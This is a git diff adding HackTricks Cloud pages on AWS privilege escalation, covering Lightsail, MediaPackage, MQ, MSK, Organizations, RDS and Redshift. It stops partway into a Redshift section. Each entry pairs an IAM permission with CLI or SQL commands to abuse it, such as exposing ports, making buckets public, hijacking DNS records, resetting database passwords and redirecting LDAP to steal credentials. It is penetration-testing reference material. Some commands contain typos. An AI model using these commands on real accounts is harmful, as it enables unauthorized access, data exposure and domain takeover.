+### `lightsail:OpenInstancePublicPorts`
+
+This permission allow to open ports to the Internet
+
+```bash
+aws lightsail open-instance-public-ports \
+    --instance-name MEAN-2 \
+    --port-info fromPort=22,protocol=TCP,toPort=22
+```
+
+**Potential Impact:** Access sensitive ports.
+
+### `lightsail:PutInstancePublicPorts`
+
+This permission allow to open ports to the Internet. Note taht the call will close any port opened not specified on it.
+
+```bash
+aws lightsail put-instance-public-ports \
+    --instance-name MEAN-2 \
+    --port-infos fromPort=22,protocol=TCP,toPort=22
+```
+
+**Potential Impact:** Access sensitive ports.
+
+### `lightsail:SetResourceAccessForBucket`
+
+This permissions allows to give an instances access to a bucket without any extra credentials
+
+{% code overflow="wrap" %}
+```bash
+aws set-resource-access-for-bucket \
+    --resource-name <instance-name> \
+    --bucket-name <bucket-name> \
+    --access allow
+```
+{% endcode %}
+
+**Potential Impact:** Potential new access to buckets with sensitive information.
+
+### `lightsail:UpdateBucket`
+
+With this permission an attacker could grant his own AWS account read access over buckets or even make the buckets public to everyone:
+
+```bash
+# Grant read access to exterenal account
+aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>
+
+# Grant read to the public
+aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true
+
+# Bucket private but single objects can be public
+aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true
+```
+
+**Potential Impact:** Potential new access to buckets with sensitive information.
+
+### `lightsail:UpdateContainerService`
+
+With this permissions an attacker could grant access to private ECRs from the containers service
+
+```bash
+aws update-container-service \
+    --service-name <name> \
+    --private-registry-access ecrImagePullerRole={isActive=boolean}
+```
+
+**Potential Impact:** Get sensitive information from private ECR
+
+### `lightsail:CreateDomainEntry`
+
+An attacker with this permission could create subdomain and point it to his own IP address (subdomain takeover), or craft a SPF record that allows him so spoof emails from the domain, or even set the main domain his own IP address.
+
+```bash
+aws lightsail create-domain-entry \
+    --domain-name example.com \
+    --domain-entry name=dev.example.com,type=A,target=192.0.2.0
+```
+
+**Potential Impact:** Takeover a domain
+
+### `lightsail:UpdateDomainEntry`
+
+An attacker with this permission could create subdomain and point it to his own IP address (subdomain takeover), or craft a SPF record that allows him so spoof emails from the domain, or even set the main domain his own IP address.
+
+```bash
+aws lightsail update-domain-entry \
+    --domain-name example.com \
+    --domain-entry name=dev.example.com,type=A,target=192.0.2.0
+```
+
+**Potential Impact:** Takeover a domain
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md
new file mode 100644
index 0000000000..3156ba72e3
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md
@@ -0,0 +1,53 @@
+# AWS - Mediapackage Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### `mediapackage:RotateChannelCredentials`
+
+Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials)
+
+```bash
+aws mediapackage rotate-channel-credentials --id <value>
+```
+
+### `mediapackage:RotateIngestEndpointCredentials`
+
+Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials)
+
+{% code overflow="wrap" %}
+```bash
+aws mediapackage rotate-ingest-endpoint-credentials --id test --ingest-endpoint-id 584797f1740548c389a273585dd22a63
+```
+{% endcode %}
+
+## References
+
+* [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md
new file mode 100644
index 0000000000..3532b180a4
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md
@@ -0,0 +1,79 @@
+# AWS - MQ Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## MQ
+
+For more information about MQ check:
+
+{% content-ref url="../aws-services/aws-mq-enum.md" %}
+[aws-mq-enum.md](../aws-services/aws-mq-enum.md)
+{% endcontent-ref %}
+
+### `mq:ListBrokers`, `mq:CreateUser`
+
+With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ):
+
+{% code overflow="wrap" %}
+```bash
+aws mq list-brokers
+aws mq create-user --broker-id <value> --console-access --password <value> --username <value>
+```
+{% endcode %}
+
+**Potential Impact:** Access sensitive info navigating through ActiveMQ
+
+### `mq:ListBrokers`, `mq:ListUsers`, `mq:UpdateUser`
+
+With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ):
+
+{% code overflow="wrap" %}
+```bash
+aws mq list-brokers
+aws mq list-users --broker-id <value>
+aws mq update-user --broker-id <value> --console-access --password <value> --username <value>
+```
+{% endcode %}
+
+**Potential Impact:** Access sensitive info navigating through ActiveMQ
+
+### `mq:ListBrokers`, `mq:UpdateBroker`
+
+If a broker is using **LDAP** for authorization with **ActiveMQ**. It's possible to **change** the **configuration** of the LDAP server used to **one controlled by the attacker**. This way the attacker will be able to **steal all the credentials being sent through LDAP**.
+
+```bash
+aws mq list-brokers
+aws mq update-broker --broker-id <value> --ldap-server-metadata=...
+```
+
+If you could somehow find the original credentials used by ActiveMQ you could perform a MitM, steal the creds, used them in the original server, and send the response (maybe just reusing the crendetials stolen you could do this).
+
+**Potential Impact:** Steal ActiveMQ credentials
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md
new file mode 100644
index 0000000000..c5a09cb298
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md
@@ -0,0 +1,52 @@
+# AWS - MSK Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## MSK
+
+For more information about MSK (Kafka) check:
+
+{% content-ref url="../aws-services/aws-msk-enum.md" %}
+[aws-msk-enum.md](../aws-services/aws-msk-enum.md)
+{% endcontent-ref %}
+
+### `msk:ListClusters`, `msk:UpdateSecurity`
+
+With these **privileges** and **access to the VPC where the kafka brokers are**, you could add the **None authentication** to access them.
+
+{% code overflow="wrap" %}
+```bash
+aws msk --client-authentication <value> --cluster-arn <value> --current-version <value>
+```
+{% endcode %}
+
+You need access to the VPC because **you cannot enable None authentication with Kafka publicly** exposed. If it's publicly exposed, if **SASL/SCRAM** authentication is used, you could **read the secret** to access (you will need additional privileges to read the secret).\
+If **IAM role-based authentication** is used and **kafka is publicly exposed** you could still abuse these privileges to give you permissions to access it.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md
new file mode 100644
index 0000000000..89b2282f25
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md
@@ -0,0 +1,44 @@
+# AWS - Organizations Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Organizations
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-organizations-enum.md" %}
+[aws-organizations-enum.md](../aws-services/aws-organizations-enum.md)
+{% endcontent-ref %}
+
+## From management Account to children accounts
+
+If you compromise the root/management account, chances are you can compromise all the children accounts.\
+To [**learn how check this page**](../#compromising-the-organization).
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md
new file mode 100644
index 0000000000..081a745749
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md
@@ -0,0 +1,206 @@
+# AWS - RDS Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## RDS - Relational Database Service
+
+For more information about RDS check:
+
+{% content-ref url="../aws-services/aws-relational-database-rds-enum.md" %}
+[aws-relational-database-rds-enum.md](../aws-services/aws-relational-database-rds-enum.md)
+{% endcontent-ref %}
+
+### `rds:ModifyDBInstance`
+
+With that permission an attacker can **modify the password of the master user**, and the login inside the database:
+
+```bash
+# Get the DB username, db name and address
+aws rds describe-db-instances
+
+# Modify the password and wait a couple of minutes
+aws rds modify-db-instance \
+    --db-instance-identifier <db-id> \
+    --master-user-password 'Llaody2f6.123' \
+    --apply-immediately
+
+# In case of postgres
+psql postgresql://<username>:<pass>@<rds-dns>:5432/<db-name>
+```
+
+{% hint style="warning" %}
+You will need to be able to **contact to the database** (they are usually only accessible from inside networks).
+{% endhint %}
+
+**Potential Impact:** Find sensitive info inside the databases.
+
+### rds-db:connect
+
+According to the [**docs**](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html) a user with this permission could connect to the DB instance.
+
+### Abuse RDS Role IAM permissions
+
+#### Postgresql (Aurora)
+
+{% hint style="success" %}
+If running **`SELECT datname FROM pg_database;`** you find a database called **`rdsadmin`** you know you are inside an **AWS postgresql database**.
+{% endhint %}
+
+First you can check if this database has been used to access any other AWS service. You could check this looking at the installed extensions:
+
+```sql
+SELECT * FROM pg_extension;
+```
+
+If you find something like **`aws_s3`** you can assume this database has **some kind of access over S3** (there are other extensions such as **`aws_ml`** and **`aws_lambda`**).
+
+Also, if you have permissions to run **`aws rds describe-db-clusters`** you can see there if the **cluster has any IAM Role attached** in the field **`AssociatedRoles`**. If any, you can assume that the database was **prepared to access other AWS services**. Based on the **name of the role** (or if you can get the **permissions** of the role) you could **guess** what extra access the database has.
+
+Now, to **read a file inside a bucket** you need to know the full path. You can read it with:
+
+```sql
+// Create table
+CREATE TABLE ttemp (col TEXT);
+
+// Create s3 uri
+SELECT aws_commons.create_s3_uri(
+   'test1234567890678', // Name of the bucket
+   'data.csv',          // Name of the file
+   'eu-west-1'          //region of the bucket
+) AS s3_uri \gset
+
+// Load file contents in table
+SELECT aws_s3.table_import_from_s3('ttemp', '', '(format text)',:'s3_uri');
+
+// Get info
+SELECT * from ttemp;
+
+// Delete table
+DROP TABLE ttemp;
+```
+
+If you had **raw AWS credentials** you could also use them to access S3 data with:
+
+```sql
+SELECT aws_s3.table_import_from_s3(
+   't', '', '(format csv)',
+   :'s3_uri', 
+   aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '')
+);
+```
+
+{% hint style="info" %}
+Postgresql **doesn't need to change any parameter group variable** to be able to access S3.
+{% endhint %}
+
+#### Mysql (Aurora)
+
+{% hint style="success" %}
+Inside a mysql, if you run the query **`SELECT User, Host FROM mysql.user;`** and there is a user called **`rdsadmin`**, you can assume you are inside an **AWS RDS mysql db**.
+{% endhint %}
+
+Inside the mysql run **`show variables;`** and if the variables such as **`aws_default_s3_role`**, **`aurora_load_from_s3_role`**, **`aurora_select_into_s3_role`**, have values, you can assume the database is prepared to access S3 data.
+
+Also, if you have permissions to run **`aws rds describe-db-clusters`** you can check if the cluster has any **associated role**, which usually means access to AWS services).
+
+Now, to **read a file inside a bucket** you need to know the full path. You can read it with:
+
+```sql
+CREATE TABLE ttemp (col TEXT);
+LOAD DATA FROM S3 's3://mybucket/data.txt' INTO TABLE ttemp(col);
+SELECT * FROM ttemp;
+DROP TABLE ttemp;
+```
+
+### `rds:AddRoleToDBCluster`, `iam:PassRole`
+
+An attacker with the permissions `rds:AddRoleToDBCluster` and `iam:PassRole` can **add a specified role to an existing RDS instance**. This could allow the attacker to **access sensitive data** or modify the data within the instance.
+
+```bash
+aws add-role-to-db-cluster --db-cluster-identifier <value> --role-arn <value>
+```
+
+**Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance.\
+Note that some DBs require additional configs such as Mysql, which needs to specify the role ARN in the aprameter groups also.
+
+### `rds:CreateDBInstance`
+
+Just with this permission an attacker could create a **new instance inside a cluster** that already exists and has an **IAM role** attached. He won't be able to change the master user password, but he might be able to expose the new database instance to the internet:
+
+```bash
+aws --region eu-west-1 --profile none-priv rds create-db-instance \
+    --db-instance-identifier mydbinstance2 \
+    --db-instance-class db.t3.medium \
+    --engine aurora-postgresql \
+    --db-cluster-identifier database-1 \
+    --db-security-groups "string" \
+    --publicly-accessible
+```
+
+### `rds:CreateDBInstance`, `iam:PassRole`
+
+{% hint style="info" %}
+TODO: Test
+{% endhint %}
+
+An attacker with the permissions `rds:CreateDBInstance` and `iam:PassRole` can **create a new RDS instance with a specified role attached**. The attacker can then potentially **access sensitive data** or modify the data within the instance.
+
+{% hint style="warning" %}
+Some requirements of the role/instance-profile to attach (from [**here**](https://docs.aws.amazon.com/cli/latest/reference/rds/create-db-instance.html)):
+
+* The profile must exist in your account.
+* The profile must have an IAM role that Amazon EC2 has permissions to assume.
+* The instance profile name and the associated IAM role name must start with the prefix `AWSRDSCustom` .
+{% endhint %}
+
+{% code overflow="wrap" %}
+```bash
+aws rds create-db-instance --db-instance-identifier malicious-instance --db-instance-class db.t2.micro --engine mysql --allocated-storage 20 --master-username admin --master-user-password mypassword --db-name mydatabase --vapc-security-group-ids sg-12345678 --db-subnet-group-name mydbsubnetgroup --enable-iam-database-authentication --custom-iam-instance-profile arn:aws:iam::123456789012:role/MyRDSEnabledRole
+```
+{% endcode %}
+
+**Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance.
+
+### `rds:AddRoleToDBInstance`, `iam:PassRole`
+
+An attacker with the permissions `rds:AddRoleToDBInstance` and `iam:PassRole` can **add a specified role to an existing RDS instance**. This could allow the attacker to **access sensitive data** or modify the data within the instance.
+
+{% hint style="warning" %}
+The DB instance must be outside of a cluster for this
+{% endhint %}
+
+{% code overflow="wrap" %}
+```bash
+aws rds add-role-to-db-instance --db-instance-identifier target-instance --role-arn arn:aws:iam::123456789012:role/MyRDSEnabledRole --feature-name <feat-name>
+```
+{% endcode %}
+
+**Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md
new file mode 100644
index 0000000000..e5098c2443
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md
@@ -0,0 +1,135 @@
+# AWS - Redshift Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Redshift
+
+For more information about RDS check:
+
+{% content-ref url="../aws-services/aws-redshift-enum.md" %}
+[aws-redshift-enum.md](../aws-services/aws-redshift-enum.md)
+{% endcontent-ref %}
+
+### `redshift:DescribeClusters`, `redshift:GetClusterCredentials`
+
+With these permissions you can get **info of all the clusters** (including name and cluster username) and **get credentials** to access it:
+
+```bash
+# Get creds
+aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1
+# Connect, even if the password is a base64 string, that is the password
+psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:<username>" -d template1 -p 5439
+```
+
+**Potential Impact:** Find sensitive info inside the databases.
+
+### `redshift:DescribeClusters`, `redshift:GetClusterCredentialsWithIAM`
+
+With these permissions you can get **info of all the clusters** and **get credentials** to access it.\
+Note that the postgres user will have the **permissions that the IAM identity** used to get the credentials has.
+
+```bash
+# Get creds
+aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1
+# Connect, even if the password is a base64 string, that is the password
+psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439
+```
+
+**Potential Impact:** Find sensitive info inside the databases.
+
+### `redshift:DescribeClusters`, `redshift:ModifyCluster?`
+
+It's possible to **modify the master password** of the internal postgres (redshit) user from aws cli (I think those are the permissions you need but I haven't tested them yet):
+
+```
+aws redshift modify-cluster –cluster-identifier <identifier-for-the cluster> –master-user-password ‘master-password’;
+```
+
+**Potential Impact:** Find sensitive info inside the databases.
+
+## Accessing External Services
+
+{% hint style="warning" %}
+To access all the following resources, you will need to **specify the role to use**. A Redshift cluster **can have assigned a list of AWS roles** that you can use **if you know the ARN** or you can just set "**default**" to use the default one assigned.
+
+Moreover, as [**explained here**](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service.html), Redshift also allows to concat roles (as long as the first one can assume the second one) to get further access but just **separating** them with a **comma**: `iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';`
+{% endhint %}
+
+### Lambdas
+
